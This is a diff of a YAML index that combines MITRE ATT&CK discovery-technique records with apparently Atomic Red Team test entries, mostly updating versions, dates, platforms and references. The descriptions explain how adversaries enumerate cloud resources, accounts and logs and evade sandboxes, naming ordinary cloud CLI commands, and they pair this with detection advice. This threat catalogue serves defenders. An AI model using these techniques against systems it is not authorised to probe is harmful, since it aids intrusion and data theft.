+        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Regina Elwell
       - Praetorian
       - Isif Ibrahima, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+        components. Monitor logs for actions that could be taken to gather information
+        about cloud infrastructure, including the use of discovery API calls by new
+        or unexpected users and enumerations from unknown or malicious IP addresses.
+        To reduce false positives, valid change management procedures could introduce
+        a known identifier that is logged with the change (e.g., tag or header) if
+        supported by the cloud provider, to help distinguish valid, expected actions
+        from malicious ones.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Instance: Instance Enumeration'
+      - 'Cloud Storage: Cloud Storage Enumeration'
+      - 'Volume: Volume Enumeration'
+      - 'Snapshot: Snapshot Enumeration'
       type: attack-pattern
       id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
       created: '2020-08-20T17:51:25.671Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1580
         url: https://attack.mitre.org/techniques/T1580
+        external_id: T1580
       - source_name: Expel IO Evil in AWS
-        url: https://expel.io/blog/finding-evil-in-aws/
         description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
           Evil in AWS. Retrieved June 25, 2020.
+        url: https://expel.io/blog/finding-evil-in-aws/
       - source_name: AWS Head Bucket
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
         description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
           14, 2022.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
       - source_name: AWS Get Public Access Block
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
       - source_name: AWS Describe DB Instances
-        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
       - source_name: Amazon Describe Instance
-        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
         description: Amazon. (n.d.). describe-instance-information. Retrieved March
           3, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
       - source_name: Amazon Describe Instances API
-        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
         description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
       - source_name: Google Compute Instances
-        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
         description: Google. (n.d.). gcloud compute instances list. Retrieved May
           26, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
       - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       - source_name: Microsoft AZ CLI
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
         description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
       - source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
-        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
         description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
           leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
-        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
-        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Cloud Infrastructure Discovery
-      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
-        components. Monitor logs for actions that could be taken to gather information
-        about cloud infrastructure, including the use of discovery API calls by new
-        or unexpected users and enumerations from unknown or malicious IP addresses.
-        To reduce false positives, valid change management procedures could introduce
-        a known identifier that is logged with the change (e.g., tag or header) if
-        supported by the cloud provider, to help distinguish valid, expected actions
-        from malicious ones.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Instance: Instance Enumeration'
-      - 'Cloud Storage: Cloud Storage Enumeration'
-      - 'Volume: Volume Enumeration'
-      - 'Snapshot: Snapshot Enumeration'
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1580
     atomic_tests:
     - name: AWS - EC2 Enumeration from Cloud Instance
@@ -60702,7 +61396,7 @@ discovery:
         elevation_required: false
   T1217:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-16T14:24:40.625Z'
       name: Browser Bookmark Discovery
       description: |-
         Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -60756,7 +61450,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1217
     atomic_tests:
     - name: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux
@@ -60830,7 +61523,7 @@ discovery:
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
-        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
@@ -60868,7 +61561,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016
     atomic_tests:
     - name: System Network Configuration Discovery
@@ -60900,7 +61592,7 @@ discovery:
         name: sh
   T1087:
     technique:
-      modified: '2024-01-12T23:36:56.245Z'
+      modified: '2024-10-15T15:35:28.784Z'
       name: Account Discovery
       description: |-
         Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -60927,14 +61619,13 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -60963,7 +61654,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1482:
     technique:
@@ -61023,7 +61713,7 @@ discovery:
         .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
         [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
         to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T19:18:22.305Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Domain Trust Discovery
       x_mitre_detection: |
@@ -61042,7 +61732,6 @@ discovery:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1482
     atomic_tests: []
   T1083:
@@ -61111,7 +61800,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1083
     atomic_tests:
     - name: Nix File and Directory Discovery
@@ -61170,7 +61858,7 @@ discovery:
         name: sh
   T1049:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-09-06T22:35:34.231Z'
       name: System Network Connections Discovery
       description: "Adversaries may attempt to get a listing of network connections
         to or from the compromised system they are currently accessing or from remote
@@ -61247,7 +61935,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1049
     atomic_tests:
     - name: System Network Connections Discovery FreeBSD, Linux & MacOS
@@ -61278,35 +61965,7 @@ discovery:
         name: sh
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -61318,6 +61977,10 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -61328,8 +61991,14 @@ discovery:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -61339,9 +62008,28 @@ discovery:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1619:
     technique:
@@ -61374,7 +62062,7 @@ discovery:
         Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
 
         Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-11T22:29:43.677Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Cloud Storage Object Discovery
       x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -61392,12 +62080,11 @@ discovery:
       - 'Cloud Storage: Cloud Storage Enumeration'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1619
     atomic_tests: []
   T1654:
     technique:
-      modified: '2023-09-30T22:18:46.711Z'
+      modified: '2024-10-15T12:24:40.892Z'
       name: Log Enumeration
       description: |-
         Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -61405,11 +62092,14 @@ discovery:
         Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
         Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+        In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
       x_mitre_contributors:
       - Bilal Bahadır Yenici
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -61420,7 +62110,7 @@ discovery:
       - macOS
       - Windows
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -61434,6 +62124,10 @@ discovery:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1654
         external_id: T1654
+      - source_name: Permiso GUI-Vil 2023
+        description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+          Cloud Threat Actor. Retrieved August 30, 2024.'
+        url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
       - source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
         description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
           of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -61453,56 +62147,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1654
     atomic_tests: []
   T1087.004:
     technique:
-      x_mitre_platforms:
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
-      type: attack-pattern
-      created: '2020-02-21T21:08:36.570Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.004
-        url: https://attack.mitre.org/techniques/T1087/004
-      - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
-        source_name: Microsoft msolrolemember
-      - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
-          6, 2019.
-        url: https://github.com/True-Demon/raindance
-        source_name: GitHub Raindance
-      - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
-        source_name: Microsoft AZ CLI
-      - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
-          Directory Leaks via Azure. Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
-        source_name: Black Hills Red Teaming MS AD Azure, 2018
-      - source_name: AWS List Roles
-        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
-      - source_name: AWS List Users
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
-        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
-      - source_name: Google Cloud - IAM Servie Accounts List API
-        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
-        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
-          August 4, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:51:18.808Z'
       name: Cloud Account
       description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
         accounts are those created and configured by an organization for use by users,
@@ -61524,19 +62173,61 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
 
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+      created: '2020-02-21T21:08:36.570Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1087/004
+        external_id: T1087.004
+      - source_name: AWS List Roles
+        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+      - source_name: AWS List Users
+        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+      - source_name: Black Hills Red Teaming MS AD Azure, 2018
+        description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+          Directory Leaks via Azure. Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+      - source_name: Google Cloud - IAM Servie Accounts List API
+        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+          August 4, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+      - source_name: Microsoft AZ CLI
+        description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+      - source_name: Microsoft msolrolemember
+        description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+      - source_name: GitHub Raindance
+        description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+          6, 2019.
+        url: https://github.com/True-Demon/raindance
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1057:
     technique:
@@ -61607,7 +62298,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1057
     atomic_tests:
     - name: Process Discovery - ps
@@ -61634,41 +62324,7 @@ discovery:
         name: sh
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
